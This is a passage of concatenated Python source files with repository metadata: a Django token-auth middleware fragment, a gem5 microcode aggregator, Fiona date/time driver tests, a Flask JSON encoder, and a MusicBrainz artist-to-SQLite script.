    except (TypeError, KeyError, User.DoesNotExist):
        # TypeError/KeyError cover a malformed payload missing "uid".
        # (A leftover debug print was removed from this auth path.)
        return AnonymousUser()
    if security_hash(user) != payload["sh"]:
        return AnonymousUser()
    return user
class JWSTokenAuthenticationMiddleware(object):
    """Django middleware that sets ``request.user`` from the Authorization
    header when a token is present."""

    def __init__(self, get_response):
        self.get_response = get_response

    def __call__(self, request):
        header = request.META.get("HTTP_AUTHORIZATION")
        if header:
            # Lazy: the token is only parsed if request.user is accessed.
            request.user = SimpleLazyObject(lambda: get_user(header))
        return self.get_response(request)
18c4129c88b31757e09434697cbe2e94d1b89608 | 2,831 | py | Python | src/arch/x86/isa/insts/simd512/floating_point/data_transfer/__init__.py | jyhuang91/gem5-avx | f988da46080f8db49beb39e20af437219f3aa4cb | [
"BSD-3-Clause"
] | 2 | 2021-01-15T17:32:18.000Z | 2021-12-21T02:53:58.000Z | src/arch/x86/isa/insts/simd512/floating_point/data_transfer/__init__.py | jyhuang91/gem5-avx | f988da46080f8db49beb39e20af437219f3aa4cb | [
"BSD-3-Clause"
] | 3 | 2021-03-26T20:33:59.000Z | 2022-01-24T22:54:03.000Z | src/arch/x86/isa/insts/simd512/floating_point/data_transfer/__init__.py | jyhuang91/gem5-avx | f988da46080f8db49beb39e20af437219f3aa4cb | [
"BSD-3-Clause"
] | 3 | 2021-03-27T16:36:19.000Z | 2022-03-28T18:32:57.000Z | # Copyright (c) 2007 The Hewlett-Packard Development Company
# All rights reserved.
#
# The license below extends only to copyright in the software and shall
# not be construed as granting a license to any other intellectual
# property including but not limited to intellectual property relating
# to a hardware implementation of the functionality of the software
# licensed hereunder. You may use the software subject to the license
# terms below provided that you ensure that this notice is replicated
# unmodified and in its entirety in all distributions of the software,
# modified or unmodified, in source code or in binary form.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met: redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer;
# redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution;
# neither the name of the copyright holders nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
# Authors: Gabe Black
# Instruction categories whose microcode fragments are aggregated below.
categories = [
    "valign",
    "vcomiss",
    "vpbroadcast",
    "vbroadcastsd",
    "vbroadcastss",
    "vblendps",
    "vextract",
    "vinsertps",
    "vinsert",
    "vmovd",
    "vmovlhps",
    "vmovq",
    "vmovhpd",
    "vmovdqa",
    "vmovddup",
    "vmovdqu",
    "vmovaps",
    "vmovapd",
    "vmovups",
    "vmovupd",
    "vmovss",
    "vmovsd",
    "vmovsldup",
    "vmovshdup",
    "vpmovdq",
    # NOTE(review): "vblendps" appears twice in this list, so its microcode
    # is appended twice below — confirm this duplication is intentional.
    "vblendps",
    "vpermilps",
    "vpermilpd",
    "vpternlog",
    "vpshufd",
    "vpextrq",
    "vshufps",
    "vunpcks",
    "vzeroupper",
]

microcode = '''
# SSE instructions
'''

# Import each category submodule and append its microcode fragment.
# importlib.import_module replaces the previous exec("from . import ...")
# pattern, which built import statements from strings.
import importlib

for category in categories:
    cat = importlib.import_module("." + category, package=__package__)
    microcode += cat.microcode
| 34.950617 | 72 | 0.731544 |
4de8053074ae1c4460d57490daef1e89791fefee | 28,669 | py | Python | tests/test_datetime.py | jGaboardi/Fiona | d36e0c897c545e0e51fe759e540c85c117bf3fc1 | [
"BSD-3-Clause"
] | 778 | 2015-01-03T18:29:34.000Z | 2022-03-31T03:17:53.000Z | tests/test_datetime.py | jGaboardi/Fiona | d36e0c897c545e0e51fe759e540c85c117bf3fc1 | [
"BSD-3-Clause"
] | 848 | 2015-01-07T17:16:10.000Z | 2022-03-27T23:14:58.000Z | tests/test_datetime.py | jGaboardi/Fiona | d36e0c897c545e0e51fe759e540c85c117bf3fc1 | [
"BSD-3-Clause"
] | 195 | 2015-01-29T21:48:37.000Z | 2022-03-25T15:18:24.000Z | """
See also test_rfc3339.py for datetime parser tests.
"""
from collections import OrderedDict
import fiona
from fiona._env import get_gdal_version_num, calc_gdal_version_num
import pytest
from fiona.errors import DriverSupportError
from fiona.rfc3339 import parse_time, parse_datetime
from .conftest import get_temp_filename
from fiona.env import GDALVersion
import datetime
from fiona.drvsupport import (supported_drivers, driver_mode_mingdal, _driver_converts_field_type_silently_to_str,
_driver_supports_field, _driver_converts_to_str, _driver_supports_timezones,
_driver_supports_milliseconds, _driver_supports_mode)
import pytz
from pytz import timezone
# GDAL version available at runtime; used to gate version-dependent expectations.
gdal_version = GDALVersion.runtime()
def get_schema(driver, field_type):
    """Return a minimal schema for *driver* with one temporal field of
    *field_type* ('date', 'datetime' or 'time')."""
    if driver == 'GPX':
        properties = OrderedDict([('ele', 'float'), ('time', field_type)])
        return {'properties': properties, 'geometry': 'Point'}
    if driver == 'GPSTrackMaker':
        properties = OrderedDict(
            [('name', 'str'), ('comment', 'str'), ('icon', 'int'),
             ('time', field_type)])
        return {'properties': properties, 'geometry': 'Point'}
    if driver == 'CSV':
        # CSV has no geometry.
        return {"properties": {"datefield": field_type}}
    return {"geometry": "Point", "properties": {"datefield": field_type}}
def get_records(driver, values):
    """Build one feature record per value in *values*, shaped for *driver*."""
    point = {"type": "Point", "coordinates": [1, 2]}
    if driver == 'GPX':
        return [
            {"geometry": point, "properties": {'ele': 0, "time": value}}
            for value in values
        ]
    if driver == 'GPSTrackMaker':
        return [
            {"geometry": point,
             "properties": OrderedDict(
                 [('name', ''), ('comment', ''), ('icon', 48),
                  ('time', value)])}
            for value in values
        ]
    if driver == 'CSV':
        # CSV records carry no geometry.
        return [{"properties": {"datefield": value}} for value in values]
    return [
        {"geometry": point, "properties": {"datefield": value}}
        for value in values
    ]
def get_schema_field(driver, schema):
    """Return the schema type of the temporal field for *driver*."""
    field_name = "time" if driver in {'GPX', 'GPSTrackMaker'} else "datefield"
    return schema["properties"][field_name]
def get_field(driver, f):
    """Return the temporal property value of feature *f* for *driver*."""
    key = "time" if driver in {'GPX', 'GPSTrackMaker'} else "datefield"
    return f["properties"][key]
class TZ(datetime.tzinfo):
    """Fixed-offset timezone; *minutes* is the UTC offset in minutes."""

    def __init__(self, minutes):
        self.minutes = minutes

    def utcoffset(self, dt):
        return datetime.timedelta(minutes=self.minutes)

    def dst(self, dt):
        # A fixed-offset zone has no DST.  Returning a zero delta (instead
        # of inheriting tzinfo.dst, which raises NotImplementedError) lets
        # datetime.astimezone()/fromutc() work with these instances.
        return datetime.timedelta(0)
def generate_testdata(field_type, driver):
    """ Generate test cases for test_datefield

    Each test case has the format [(in_value1, true_value as datetime.*object),
    (in_value2, true_value as datetime.*object), ...]

    Input values are given both as RFC 3339 strings and as datetime.*
    objects; expected values are always datetime.* objects.  Note that
    fractional seconds are truncated to millisecond precision in the
    expected values (e.g. 123456 us -> 123000 us).
    """
    # Test data for 'date' data type
    if field_type == 'date':
        return [("2018-03-25", datetime.date(2018, 3, 25)),
                (datetime.date(2018, 3, 25), datetime.date(2018, 3, 25))]
    # Test data for 'datetime' data type
    if field_type == 'datetime':
        return [("2018-03-25T22:49:05", datetime.datetime(2018, 3, 25, 22, 49, 5)),
                (datetime.datetime(2018, 3, 25, 22, 49, 5), datetime.datetime(2018, 3, 25, 22, 49, 5)),
                ("2018-03-25T22:49:05.23", datetime.datetime(2018, 3, 25, 22, 49, 5, 230000)),
                (datetime.datetime(2018, 3, 25, 22, 49, 5, 230000), datetime.datetime(2018, 3, 25, 22, 49, 5, 230000)),
                ("2018-03-25T22:49:05.123456", datetime.datetime(2018, 3, 25, 22, 49, 5, 123000)),
                (datetime.datetime(2018, 3, 25, 22, 49, 5, 123456), datetime.datetime(2018, 3, 25, 22, 49, 5, 123000)),
                # Fixed-offset timezones, both signs.
                ("2018-03-25T22:49:05+01:30", datetime.datetime(2018, 3, 25, 22, 49, 5, tzinfo=TZ(90))),
                ("2018-03-25T22:49:05-01:30", datetime.datetime(2018, 3, 25, 22, 49, 5, tzinfo=TZ(-90))),
                (datetime.datetime(2018, 3, 25, 22, 49, 5, tzinfo=TZ(90)),
                 datetime.datetime(2018, 3, 25, 22, 49, 5, tzinfo=TZ(90))),
                (datetime.datetime(2018, 3, 25, 22, 49, 5, tzinfo=TZ(-90)),
                 datetime.datetime(2018, 3, 25, 22, 49, 5, tzinfo=TZ(-90))),
                # Named (pytz) timezones on either side of UTC.
                (datetime.datetime(2020, 1, 21, 12, 0, 0, tzinfo=pytz.utc).astimezone(timezone('Europe/Zurich')),
                 datetime.datetime(2020, 1, 21, 12, 0, 0, tzinfo=pytz.utc).astimezone(timezone('Europe/Zurich'))),
                (datetime.datetime(2020, 1, 21, 12, 0, 0, tzinfo=pytz.utc).astimezone(timezone('US/Mountain')),
                 datetime.datetime(2020, 1, 21, 12, 0, 0, tzinfo=pytz.utc).astimezone(timezone('US/Mountain'))),
                # Extreme offsets just inside +/-24 hours.
                (datetime.datetime(2018, 3, 25, 22, 49, 5, tzinfo=TZ(60 * 24 - 15)),
                 datetime.datetime(2018, 3, 25, 22, 49, 5, tzinfo=TZ(60 * 24 - 15))),
                (datetime.datetime(2018, 3, 25, 22, 49, 5, tzinfo=TZ(-60 * 24 + 15)),
                 datetime.datetime(2018, 3, 25, 22, 49, 5, tzinfo=TZ(-60 * 24 + 15))),
                ("2018-03-25T22:49:05-23:45", datetime.datetime(2018, 3, 25, 22, 49, 5, tzinfo=TZ(-60 * 24 + 15))),
                ("2018-03-25T22:49:05+23:45", datetime.datetime(2018, 3, 25, 22, 49, 5, tzinfo=TZ(60 * 24 - 15)))]
    # Test data for 'time' data type
    elif field_type == 'time':
        return [("22:49:05", datetime.time(22, 49, 5)),
                (datetime.time(22, 49, 5), datetime.time(22, 49, 5)),
                ("22:49:05.23", datetime.time(22, 49, 5, 230000)),
                (datetime.time(22, 49, 5, 230000), datetime.time(22, 49, 5, 230000)),
                ("22:49:05.123456", datetime.time(22, 49, 5, 123000)),
                (datetime.time(22, 49, 5, 123456), datetime.time(22, 49, 5, 123000)),
                ("22:49:05+01:30", datetime.time(22, 49, 5, tzinfo=TZ(90))),
                ("22:49:05-01:30", datetime.time(22, 49, 5, tzinfo=TZ(-90))),
                (datetime.time(22, 49, 5, tzinfo=TZ(90)), datetime.time(22, 49, 5, tzinfo=TZ(90))),
                (datetime.time(22, 49, 5, tzinfo=TZ(-90)), datetime.time(22, 49, 5, tzinfo=TZ(-90))),
                (datetime.time(22, 49, 5, tzinfo=TZ(60 * 24 - 15)),
                 datetime.time(22, 49, 5, tzinfo=TZ(60 * 24 - 15))),
                (datetime.time(22, 49, 5, tzinfo=TZ(-60 * 24 + 15)),
                 datetime.time(22, 49, 5, tzinfo=TZ(-60 * 24 + 15))),
                ("22:49:05-23:45", datetime.time(22, 49, 5, tzinfo=TZ(-60 * 24 + 15))),
                ("22:49:05+23:45", datetime.time(22, 49, 5, tzinfo=TZ(60 * 24 - 15)))]
def compare_datetimes_utc(d1, d2):
    """Return True if d1 and d2 denote the same instant.

    Naive datetimes are interpreted as UTC before comparing.
    """
    normalized = []
    for value in (d1, d2):
        if value.tzinfo is None:
            value = value.replace(tzinfo=TZ(0))
        normalized.append(value)
    return normalized[0] == normalized[1]
def test_compare_datetimes_utc():
    """ Test compare_datetimes_utc """
    cases = [
        (datetime.datetime(2020, 1, 21, 12, 30, 0, tzinfo=TZ(60)),
         datetime.datetime(2020, 1, 21, 11, 30, 0, tzinfo=TZ(0)),
         True),
        (datetime.datetime(2020, 1, 21, 12, 30, 0, tzinfo=TZ(-60)),
         datetime.datetime(2020, 1, 21, 11, 30, 0, tzinfo=TZ(0)),
         False),
        (datetime.datetime(2020, 1, 21, 13, 0, 0, tzinfo=TZ(60)),
         datetime.datetime(2020, 1, 21, 5, 0, 0, tzinfo=TZ(-60 * 7)),
         True),
        (datetime.datetime(2020, 1, 21, 12, 0, 0, tzinfo=pytz.utc).astimezone(timezone('Europe/Zurich')),
         datetime.datetime(2020, 1, 21, 12, 0, 0, tzinfo=pytz.utc),
         True),
        (datetime.datetime(2020, 1, 21, 12, 0, 0, tzinfo=pytz.utc).astimezone(timezone('Europe/Zurich')),
         datetime.datetime(2020, 1, 21, 12, 0, 0, tzinfo=pytz.utc).astimezone(timezone('US/Mountain')),
         True),
        (datetime.datetime(2020, 6, 21, 12, 0, 0, tzinfo=pytz.utc).astimezone(timezone('Europe/Zurich')),
         datetime.datetime(2020, 6, 21, 12, 0, 0, tzinfo=pytz.utc).astimezone(timezone('US/Mountain')),
         True),
    ]
    for d1, d2, expected in cases:
        # The stdlib comparison and our UTC-normalizing helper must agree.
        assert (d1 == d2) == expected
        assert compare_datetimes_utc(d1, d2) == expected
def convert_time_to_utc(d):
    """Return the UTC wall-clock time of an aware datetime.time as a naive time."""
    # Anchor the time-of-day on an arbitrary date so timedelta arithmetic works;
    # combine() carries over the tzinfo of d.
    anchored = datetime.datetime.combine(datetime.date(1900, 1, 1), d)
    utc_moment = anchored - anchored.utcoffset()
    return utc_moment.time()
def compare_times_utc(d1, d2):
    """Compare two datetime.time values by their UTC wall-clock time.

    Aware times are normalized to UTC first; naive times are used as-is.
    """
    normalized = [t if t.tzinfo is None else convert_time_to_utc(t)
                  for t in (d1, d2)]
    return normalized[0].replace(tzinfo=None) == normalized[1].replace(tzinfo=None)
def test_compare_times_utc():
    """
    Test compare_times_utc
    """
    cases = [
        (datetime.time(12, 30, 0, tzinfo=TZ(60)),
         datetime.time(11, 30, 0, tzinfo=TZ(0)),
         True),
        (datetime.time(12, 30, 0, tzinfo=TZ(-60)),
         datetime.time(11, 30, 0, tzinfo=TZ(0)),
         False),
        (datetime.time(13, 0, 0, tzinfo=TZ(60)),
         datetime.time(5, 0, 0, tzinfo=TZ(-60 * 7)),
         True),
        (datetime.datetime(2020, 6, 21, 12, 0, 0, tzinfo=pytz.utc).astimezone(timezone('MET')).timetz(),
         datetime.datetime(2020, 6, 21, 12, 0, 0, tzinfo=pytz.utc).astimezone(timezone('EST')).timetz(),
         True),
    ]
    for d1, d2, expected in cases:
        assert compare_times_utc(d1, d2) == expected
def get_tz_offset(d):
    """Return the UTC offset of d as a (sign, hours, minutes) tuple.

    E.g. for '2020-01-21T12:30:00+01:30' the result is ('+', 1, 30).
    """
    total_minutes = d.utcoffset().total_seconds() / 60
    sign = "-" if total_minutes < 0 else "+"
    hours, minutes = divmod(abs(total_minutes), 60)
    return sign, int(hours), int(minutes)
def test_get_tz_offset():
    """ Test get_tz_offset"""
    expectations = [
        (90, ('+', 1, 30)),
        (-90, ('-', 1, 30)),
        (60 * 24 - 15, ('+', 23, 45)),
        (-60 * 24 + 15, ('-', 23, 45)),
    ]
    for offset_minutes, expected in expectations:
        d = datetime.datetime(2020, 1, 21, 12, 30, 0, tzinfo=TZ(offset_minutes))
        assert get_tz_offset(d) == expected
def generate_testcases():
    """Partition (driver, field_type) pairs by their date/time field support.

    Returns three lists of (driver, field_type) tuples: drivers supporting
    the field type natively, drivers that silently convert it to str, and
    drivers that do not support it at all.  Only write-capable drivers are
    considered.
    """
    native = []
    to_str = []
    unsupported = []
    for field_type in ('time', 'datetime', 'date'):
        for driver in supported_drivers:
            # Select only drivers that are capable of writing fields.
            if not _driver_supports_mode(driver, 'w'):
                continue
            if not _driver_supports_field(driver, field_type):
                unsupported.append((driver, field_type))
            elif _driver_converts_field_type_silently_to_str(driver, field_type):
                to_str.append((driver, field_type))
            else:
                native.append((driver, field_type))
    return native, to_str, unsupported
# Build the per-(driver, field_type) parametrization lists once at import
# time; they feed the @pytest.mark.parametrize decorators below.
test_cases_datefield, test_cases_datefield_to_str, test_cases_datefield_not_supported = generate_testcases()
@pytest.mark.parametrize("driver, field_type", test_cases_datefield)
def test_datefield(tmpdir, driver, field_type):
    """
    Test date, time, datetime field types.

    Writes a set of known values with the given driver, reads them back and
    checks the round trip against the expected values.
    """
    def _validate(val, val_exp, field_type, driver):
        # True if the value read back (val, a string) matches the expected
        # value (val_exp, a date/datetime/time object).
        if field_type == 'date':
            return val == val_exp.isoformat()
        elif field_type == 'datetime':
            # Some drivers do not support timezones. In this case, Fiona converts
            # datetime fields with a timezone other than UTC to UTC. Thus, both the
            # datetime read by Fiona, as well as the expected value, are converted
            # to UTC before being compared.
            y, m, d, hh, mm, ss, ms, tz = parse_datetime(val)
            if tz is not None:
                tz = TZ(tz)
            val_d = datetime.datetime(y, m, d, hh, mm, ss, ms, tz)
            if not _driver_supports_milliseconds(driver):
                # Drivers without sub-second support drop the microseconds.
                val_exp = val_exp.replace(microsecond=0)
            return compare_datetimes_utc(val_d, val_exp)
        elif field_type == 'time':
            # Same timezone note as for 'datetime' above.
            y, m, d, hh, mm, ss, ms, tz = parse_time(val)
            if tz is not None:
                tz = TZ(tz)
            val_d = datetime.time(hh, mm, ss, ms, tz)
            if not _driver_supports_milliseconds(driver):
                val_exp = val_exp.replace(microsecond=0)
            return compare_times_utc(val_d, val_exp)
        return False
    schema = get_schema(driver, field_type)
    path = str(tmpdir.join(get_temp_filename(driver)))
    values_in, values_exp = zip(*generate_testdata(field_type, driver))
    records = get_records(driver, values_in)
    with fiona.open(path, 'w',
                    driver=driver,
                    schema=schema) as c:
        c.writerecords(records)
    with fiona.open(path, 'r') as c:
        assert get_schema_field(driver, c.schema) == field_type
        items = [get_field(driver, f) for f in c]
        assert len(items) == len(values_in)
        for val, val_exp in zip(items, values_exp):
            assert _validate(val, val_exp, field_type, driver), \
                "{} does not match {}".format(val, val_exp.isoformat())
@pytest.mark.parametrize("driver, field_type", test_cases_datefield_to_str)
def test_datefield_driver_converts_to_string(tmpdir, driver, field_type):
    """
    Test handling of date, time, datetime for drivers that convert these types to string.

    As the formatting can be arbitrary, we only test if the elements of a
    date / datetime / time object are included in the string. E.g. for the
    PCIDSK driver if hour 22 from date.time(22:49:05) is in
    '0000/00/00 22:49:05'.
    """
    def _tz_string(val_exp):
        # Render the expected UTC offset as +HHMM, or +HH when there is no
        # minute component.
        sign, hours, minutes = get_tz_offset(val_exp)
        if minutes > 0:
            return "{sign}{hours:02d}{minutes:02d}".format(sign=sign,
                                                           hours=int(hours),
                                                           minutes=int(minutes))
        return "{sign}{hours:02d}".format(sign=sign, hours=int(hours))

    def _contains_all(val, parts):
        # True if the string form of every component appears somewhere in val.
        return all(str(part) in val for part in parts)

    def _validate(val, val_exp, field_type, driver):
        if field_type == 'date':
            return _contains_all(val, [val_exp.year, val_exp.month, val_exp.day])
        if field_type == 'datetime':
            if not _driver_supports_timezones(driver, field_type) and val_exp.utcoffset() is not None:
                # Driver cannot store the offset: Fiona writes the UTC
                # wall-clock value instead.  Keep the full date here; the
                # time-only helper convert_time_to_utc would discard it.
                val_exp = (val_exp - val_exp.utcoffset()).replace(tzinfo=None)
            parts = [val_exp.year, val_exp.month, val_exp.day,
                     val_exp.hour, val_exp.minute, val_exp.second]
        elif field_type == 'time':
            if not _driver_supports_timezones(driver, field_type) and val_exp.utcoffset() is not None:
                val_exp = convert_time_to_utc(val_exp)
            parts = [val_exp.hour, val_exp.minute, val_exp.second]
        else:
            return False
        if val_exp.utcoffset() is not None:
            parts.append(_tz_string(val_exp))
        if not _driver_supports_milliseconds(driver):
            return _contains_all(val, parts)
        # Depending on the GDAL/driver version the sub-second part may be
        # rendered as microseconds or as milliseconds; accept either.
        return (_contains_all(val, parts + [val_exp.microsecond]) or
                _contains_all(val, parts + [int(val_exp.microsecond / 1000)]))

    schema = get_schema(driver, field_type)
    path = str(tmpdir.join(get_temp_filename(driver)))
    values_in, values_exp = zip(*generate_testdata(field_type, driver))
    records = get_records(driver, values_exp)
    with pytest.warns(UserWarning) as record:
        with fiona.open(path, 'w',
                        driver=driver,
                        schema=schema) as c:
            c.writerecords(records)
        assert len(record) == 1
        assert "silently converts" in record[0].message.args[0]
    with fiona.open(path, 'r') as c:
        assert get_schema_field(driver, c.schema) == 'str'
        items = [get_field(driver, f) for f in c]
        assert len(items) == len(values_in)
        for val, val_exp in zip(items, values_exp):
            assert _validate(val, val_exp, field_type, driver), \
                "{} does not match {}".format(val, val_exp.isoformat())
@pytest.mark.filterwarnings('ignore:.*driver silently converts *:UserWarning')
@pytest.mark.parametrize("driver,field_type", test_cases_datefield + test_cases_datefield_to_str)
def test_datefield_null(tmpdir, driver, field_type):
    """
    Test handling of null values for date, time, datetime types for write capable drivers
    """
    def _validate(val, val_exp, field_type, driver):
        # Affected MapInfo/GDAL versions materialize a null time as midnight.
        mapinfo_midnight_quirk = (
            driver == 'MapInfo File' and field_type == 'time' and
            calc_gdal_version_num(2, 0, 0) <= get_gdal_version_num() < calc_gdal_version_num(3, 1, 1))
        if mapinfo_midnight_quirk:
            return val == '00:00:00'
        return val is None or val == ''
    schema = get_schema(driver, field_type)
    path = str(tmpdir.join(get_temp_filename(driver)))
    records = get_records(driver, [None])
    with fiona.open(path, 'w',
                    driver=driver,
                    schema=schema) as c:
        c.writerecords(records)
    with fiona.open(path, 'r') as c:
        items = [get_field(driver, f) for f in c]
        assert len(items) == 1
        assert _validate(items[0], None, field_type, driver), \
            "{} does not match {}".format(items[0], None)
@pytest.mark.parametrize("driver, field_type", test_cases_datefield_not_supported)
def test_datetime_field_unsupported(tmpdir, driver, field_type):
    """ Test if DriverSupportError is raised for unsupported field_types"""
    schema = get_schema(driver, field_type)
    path = str(tmpdir.join(get_temp_filename(driver)))
    test_values, _ = zip(*generate_testdata(field_type, driver))
    records = get_records(driver, test_values)
    # Writing an unsupported field type must fail up front.
    with pytest.raises(DriverSupportError):
        with fiona.open(path, 'w',
                        driver=driver,
                        schema=schema) as c:
            c.writerecords(records)
@pytest.mark.parametrize("driver, field_type", test_cases_datefield_not_supported)
def test_datetime_field_type_marked_not_supported_is_not_supported(tmpdir, driver, field_type, monkeypatch):
    """ Test if a date/datetime/time field type marked as not supported is really not supported

    Warning: Success of this test does not necessarily mean that a field is not supported. E.g. errors can
    occur due to special schema requirements of drivers. This test only covers the standard case.
    """
    if driver == "BNA" and GDALVersion.runtime() < GDALVersion(2, 0):
        pytest.skip("BNA driver segfaults with gdal 1.11")
    # Pretend the field type is supported so that the write is attempted.
    monkeypatch.delitem(fiona.drvsupport._driver_field_type_unsupported[field_type], driver)
    schema = get_schema(driver, field_type)
    path = str(tmpdir.join(get_temp_filename(driver)))
    values_in, values_out = zip(*generate_testdata(field_type, driver))
    records = get_records(driver, values_in)
    is_good = True
    try:
        with fiona.open(path, 'w',
                        driver=driver,
                        schema=schema) as c:
            c.writerecords(records)
        with fiona.open(path, 'r') as c:
            if not get_schema_field(driver, c.schema) == field_type:
                is_good = False
            items = [get_field(driver, f) for f in c]
            for val_in, val_out in zip(items, values_out):
                if not val_in == val_out:
                    is_good = False
    except Exception:
        # Any failure while writing or reading back confirms the driver does
        # not support the field type.  (The original bare `except:` would also
        # have swallowed KeyboardInterrupt / SystemExit.)
        is_good = False
    assert not is_good
def generate_tostr_testcases():
    """ Flatten driver_converts_to_str to a list of (field_type, driver) tuples"""
    return [
        (field_type, driver)
        for field_type, drivers in _driver_converts_to_str.items()
        for driver in drivers
        if (driver in supported_drivers and
            _driver_supports_mode(driver, 'w') and
            _driver_converts_field_type_silently_to_str(driver, field_type) and
            _driver_supports_field(driver, field_type))
    ]
@pytest.mark.filterwarnings('ignore:.*driver silently converts *:UserWarning')
@pytest.mark.parametrize("driver,field_type", test_cases_datefield_to_str)
def test_driver_marked_as_silently_converts_to_str_converts_silently_to_str(tmpdir, driver, field_type, monkeypatch):
    """ Test if a driver and field_type is marked in fiona.drvsupport.driver_converts_to_str to convert to str really
        silently converts to str

        If this test fails, it should be considered to replace the respective None value in
        fiona.drvsupport.driver_converts_to_str with a GDALVersion(major, minor) value.
    """
    # Remove the "converts to str" marker so no warning machinery interferes.
    monkeypatch.delitem(fiona.drvsupport._driver_converts_to_str[field_type], driver)
    schema = get_schema(driver, field_type)
    path = str(tmpdir.join(get_temp_filename(driver)))
    written_values, _ = zip(*generate_testdata(field_type, driver))
    records = get_records(driver, written_values)
    with fiona.open(path, 'w',
                    driver=driver,
                    schema=schema) as c:
        c.writerecords(records)
    # The driver should have degraded the field type to plain strings.
    with fiona.open(path, 'r') as c:
        assert get_schema_field(driver, c.schema) == 'str'
def test_read_timezone_geojson(path_test_tz_geojson):
    """Test if timezones are read correctly"""
    with fiona.open(path_test_tz_geojson) as collection:
        features = list(collection)
    first_props = features[0]['properties']
    assert first_props['test'] == '2015-04-22T00:00:00+07:00'
| 43.437879 | 119 | 0.569291 |
63db1990aa68a257710894f48b6c13126400c844 | 372 | py | Python | submissions-api/app/main/encoder.py | sanger-tol/tol-submissions | 8dbbfaa98b1dfa09a09cb54cf1b2eb9d1dca5331 | [
"MIT"
] | null | null | null | submissions-api/app/main/encoder.py | sanger-tol/tol-submissions | 8dbbfaa98b1dfa09a09cb54cf1b2eb9d1dca5331 | [
"MIT"
] | null | null | null | submissions-api/app/main/encoder.py | sanger-tol/tol-submissions | 8dbbfaa98b1dfa09a09cb54cf1b2eb9d1dca5331 | [
"MIT"
] | null | null | null | # SPDX-FileCopyrightText: 2021 Genome Research Ltd.
#
# SPDX-License-Identifier: MIT
from connexion.apps.flask_app import FlaskJSONEncoder
from main.model import Base
class JSONEncoder(FlaskJSONEncoder):
    """JSON encoder that serializes SQLAlchemy model instances.

    Subclasses of Base are rendered via their to_dict() representation;
    everything else is deferred to Flask's default encoder.
    """
    include_nulls = False

    def default(self, o):
        if not isinstance(o, Base):
            return FlaskJSONEncoder.default(self, o)
        return o.to_dict()
| 23.25 | 53 | 0.717742 |
8a410d44c66e892332923e60f2f110228ce177c9 | 1,365 | py | Python | Ago-Dic-2019/ERIK EDUARDO MONTOYA MARTINEZ/2doParcial/ApiMusicbrainz.py | Arbupa/DAS_Sistemas | 52263ab91436b2e5a24ce6f8493aaa2e2fe92fb1 | [
"MIT"
] | 41 | 2017-09-26T09:36:32.000Z | 2022-03-19T18:05:25.000Z | Ago-Dic-2019/ERIK EDUARDO MONTOYA MARTINEZ/2doParcial/ApiMusicbrainz.py | Arbupa/DAS_Sistemas | 52263ab91436b2e5a24ce6f8493aaa2e2fe92fb1 | [
"MIT"
] | 67 | 2017-09-11T05:06:12.000Z | 2022-02-14T04:44:04.000Z | Ago-Dic-2019/ERIK EDUARDO MONTOYA MARTINEZ/2doParcial/ApiMusicbrainz.py | Arbupa/DAS_Sistemas | 52263ab91436b2e5a24ce6f8493aaa2e2fe92fb1 | [
"MIT"
] | 210 | 2017-09-01T00:10:08.000Z | 2022-03-19T18:05:12.000Z | import sqlite3
import pprint
import musicbrainzngs
from ObjetoArtista import Artista
def search():
    """Query MusicBrainz for rock/metal artists from Los Angeles (US) and
    persist each result to the local SQLite database via save().
    """
    musicbrainzngs.set_useragent('musicbrainzngs', '2.0')
    Art = musicbrainzngs.search_artists(area='Los Angeles', tag='[rock,metal]', country="US", limit=100)
    # Iterate the result list directly; j reproduces the original 1-based id.
    for j, artist in enumerate(Art['artist-list'], start=1):
        # Build the domain object.  The original code recursively called
        # search(id=j, ...) here, which takes no arguments and would have
        # raised a TypeError on the first iteration; Artista was clearly
        # the intended constructor (it is imported above and save() reads
        # the matching attributes).
        art = Artista(id=j,
                      nombre=artist['name'],
                      area=artist['area']['name'],
                      sort=artist['sort-name'],
                      id2=artist['id'],
                      eScore=artist['ext:score'],
                      tipoC=artist['area']['type'])
        save(art)
def save(arti):
    """Insert one Artista row into the Artistas table of musicbrainzDB.db.

    Uses a parameterized query instead of str.format so values containing
    quotes (or hostile input) cannot break the statement or inject SQL.
    """
    conexion = None  # guard: connect() may fail before assignment
    try:
        conexion = sqlite3.connect('musicbrainzDB.db')
        cursor = conexion.cursor()
        cursor.execute(
            "INSERT INTO Artistas VALUES (?,?,?,?,?,?,?)",
            (arti._id, arti._nombre, arti._area, arti._sortname,
             arti._eScore, arti._tipoC, arti._id2))
        conexion.commit()
        cursor.close()
    except sqlite3.Error as error:
        print('Error con la conexión!', error)
    finally:
        if conexion:
            conexion.close()
            print('Conexión a SQLite cerrada\n')
def main():
    # Entry point: fetch artists from MusicBrainz and store them in SQLite.
    search()
if __name__ == '__main__':
main() | 31.022727 | 170 | 0.594872 |
e5ea2e1bf84a5f473d865d02f893af7632634567 | 6,335 | py | Python | 2019/day17/day17.py | mdelmage/advent2019 | eae18fd8010c9816b22578d6eb8988139aef131d | [
"MIT"
] | 2 | 2020-12-02T20:44:33.000Z | 2020-12-09T23:35:35.000Z | 2019/day17/day17.py | mdelmage/advent2019 | eae18fd8010c9816b22578d6eb8988139aef131d | [
"MIT"
